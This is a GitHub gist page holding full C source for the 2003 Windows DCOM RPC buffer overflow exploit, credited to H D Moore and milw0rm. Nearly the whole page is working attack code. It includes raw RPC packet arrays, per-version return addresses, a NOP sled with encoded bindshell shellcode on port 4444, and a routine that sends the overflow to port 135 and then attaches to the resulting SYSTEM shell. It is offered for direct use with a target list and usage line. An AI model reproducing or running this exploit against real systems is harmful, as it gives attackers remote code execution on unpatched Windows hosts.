Created
March 3, 2019 20:41
-
-
Save ahadsheriff/84b1fd452ba398ec4f6ad541d2441e40 to your computer and use it in GitHub Desktop.
Windows RPC Overflow Exploit Code
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code | |
| Written by H D Moore <hdm [at] metasploit.com> | |
| - Usage: ./dcom <Target ID> <Target IP> | |
| - Targets: | |
| - 0 Windows 2000 SP0 (english) | |
| - 1 Windows 2000 SP1 (english) | |
| - 2 Windows 2000 SP2 (english) | |
| - 3 Windows 2000 SP3 (english) | |
| - 4 Windows 2000 SP4 (english) | |
| - 5 Windows XP SP0 (english) | |
| - 6 Windows XP SP1 (english) | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <error.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <arpa/inet.h> | |
| #include <unistd.h> | |
| #include <netdb.h> | |
| #include <fcntl.h> | |
| #include <unistd.h> | |
| unsigned char bindstr[]={ | |
| 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, | |
| 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, | |
| 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, | |
| 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, | |
| 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; | |
| unsigned char request1[]={ | |
| 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 | |
| ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 | |
| ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 | |
| ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E | |
| ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D | |
| ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 | |
| ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 | |
| ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 | |
| ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 | |
| ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 | |
| ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 | |
| ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 | |
| ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 | |
| ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF | |
| ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 | |
| ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 | |
| ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 | |
| ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 | |
| ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 | |
| ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 | |
| ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 | |
| ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E | |
| ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 | |
| ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 | |
| ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 | |
| ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 | |
| ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 | |
| ,0x00,0x00,0x00,0x00,0x00,0x00}; | |
| unsigned char request2[]={ | |
| 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 | |
| ,0x00,0x00,0x5C,0x00,0x5C,0x00}; | |
| unsigned char request3[]={ | |
| 0x5C,0x00 | |
| ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 | |
| ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 | |
| ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 | |
| ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; | |
| unsigned char *targets [] = | |
| { | |
| "Windows 2000 SP0 (english)", | |
| "Windows 2000 SP1 (english)", | |
| "Windows 2000 SP2 (english)", | |
| "Windows 2000 SP3 (english)", | |
| "Windows 2000 SP4 (english)", | |
| "Windows XP SP0 (english)", | |
| "Windows XP SP1 (english)", | |
| NULL | |
| }; | |
| unsigned long offsets [] = | |
| { | |
| 0x77e81674, | |
| 0x77e829ec, | |
| 0x77e824b5, | |
| 0x77e8367a, | |
| 0x77f92a9b, | |
| 0x77e9afe3, | |
| 0x77e626ba, | |
| }; | |
| unsigned char sc[]= | |
| "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" | |
| "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" | |
| "\x46\x00\x58\x00\x46\x00\x58\x00" | |
| "\xff\xff\xff\xff" /* return address */ | |
| "\xcc\xe0\xfd\x7f" /* primary thread data block */ | |
| "\xcc\xe0\xfd\x7f" /* primary thread data block */ | |
| /* port 4444 bindshell */ | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
| "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" | |
| "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" | |
| "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" | |
| "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" | |
| "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" | |
| "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" | |
| "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" | |
| "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81" | |
| "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" | |
| "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" | |
| "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" | |
| "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" | |
| "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" | |
| "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" | |
| "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" | |
| "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" | |
| "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" | |
| "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" | |
| "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" | |
| "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" | |
| "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" | |
| "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" | |
| "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" | |
| "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" | |
| "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" | |
| "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" | |
| "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" | |
| "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" | |
| "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" | |
| "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" | |
| "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" | |
| "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; | |
| unsigned char request4[]={ | |
| 0x01,0x10 | |
| ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 | |
| ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C | |
| ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 | |
| }; | |
| /* ripped from TESO code */ | |
| void shell (int sock) | |
| { | |
| int l; | |
| char buf[512]; | |
| fd_set rfds; | |
| while (1) { | |
| FD_SET (0, &rfds); | |
| FD_SET (sock, &rfds); | |
| select (sock + 1, &rfds, NULL, NULL, NULL); | |
| if (FD_ISSET (0, &rfds)) { | |
| l = read (0, buf, sizeof (buf)); | |
| if (l <= 0) { | |
| printf("\n - Connection closed by local user\n"); | |
| exit (EXIT_FAILURE); | |
| } | |
| write (sock, buf, l); | |
| } | |
| if (FD_ISSET (sock, &rfds)) { | |
| l = read (sock, buf, sizeof (buf)); | |
| if (l == 0) { | |
| printf ("\n - Connection closed by remote host.\n"); | |
| exit (EXIT_FAILURE); | |
| } else if (l < 0) { | |
| printf ("\n - Read failure\n"); | |
| exit (EXIT_FAILURE); | |
| } | |
| write (1, buf, l); | |
| } | |
| } | |
| } | |
| int main(int argc, char **argv) | |
| { | |
| int sock; | |
| int len,len1; | |
| unsigned int target_id; | |
| unsigned long ret; | |
| struct sockaddr_in target_ip; | |
| unsigned short port = 135; | |
| unsigned char buf1[0x1000]; | |
| unsigned char buf2[0x1000]; | |
| printf("---------------------------------------------------------\n"); | |
| printf("- Remote DCOM RPC Buffer Overflow Exploit\n"); | |
| printf("- Original code by FlashSky and Benjurry\n"); | |
| printf("- Rewritten by HDM <hdm [at] metasploit.com>\n"); | |
| if(argc<3) | |
| { | |
| printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]); | |
| printf("- Targets:\n"); | |
| for (len=0; targets[len] != NULL; len++) | |
| { | |
| printf("- %d\t%s\n", len, targets[len]); | |
| } | |
| printf("\n"); | |
| exit(1); | |
| } | |
| /* yeah, get over it :) */ | |
| target_id = atoi(argv[1]); | |
| ret = offsets[target_id]; | |
| printf("- Using return address of 0x%.8x\n", ret); | |
| memcpy(sc+36, (unsigned char *) &ret, 4); | |
| target_ip.sin_family = AF_INET; | |
| target_ip.sin_addr.s_addr = inet_addr(argv[2]); | |
| target_ip.sin_port = htons(port); | |
| if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) | |
| { | |
| perror("- Socket"); | |
| return(0); | |
| } | |
| if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) | |
| { | |
| perror("- Connect"); | |
| return(0); | |
| } | |
| len=sizeof(sc); | |
| memcpy(buf2,request1,sizeof(request1)); | |
| len1=sizeof(request1); | |
| *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; | |
| *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; | |
| memcpy(buf2+len1,request2,sizeof(request2)); | |
| len1=len1+sizeof(request2); | |
| memcpy(buf2+len1,sc,sizeof(sc)); | |
| len1=len1+sizeof(sc); | |
| memcpy(buf2+len1,request3,sizeof(request3)); | |
| len1=len1+sizeof(request3); | |
| memcpy(buf2+len1,request4,sizeof(request4)); | |
| len1=len1+sizeof(request4); | |
| *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; | |
| *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; | |
| *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; | |
| *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; | |
| *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; | |
| *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; | |
| *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; | |
| *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; | |
| if (send(sock,bindstr,sizeof(bindstr),0)== -1) | |
| { | |
| perror("- Send"); | |
| return(0); | |
| } | |
| len=recv(sock, buf1, 1000, 0); | |
| if (send(sock,buf2,len1,0)== -1) | |
| { | |
| perror("- Send"); | |
| return(0); | |
| } | |
| close(sock); | |
| sleep(1); | |
| target_ip.sin_family = AF_INET; | |
| target_ip.sin_addr.s_addr = inet_addr(argv[2]); | |
| target_ip.sin_port = htons(4444); | |
| if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) | |
| { | |
| perror("- Socket"); | |
| return(0); | |
| } | |
| if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0) | |
| { | |
| printf("- Exploit appeared to have failed.\n"); | |
| return(0); | |
| } | |
| printf("- Dropping to System Shell...\n\n"); | |
| shell(sock); | |
| return(0); | |
| } | |
| // milw0rm.com [2003-07-26] | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment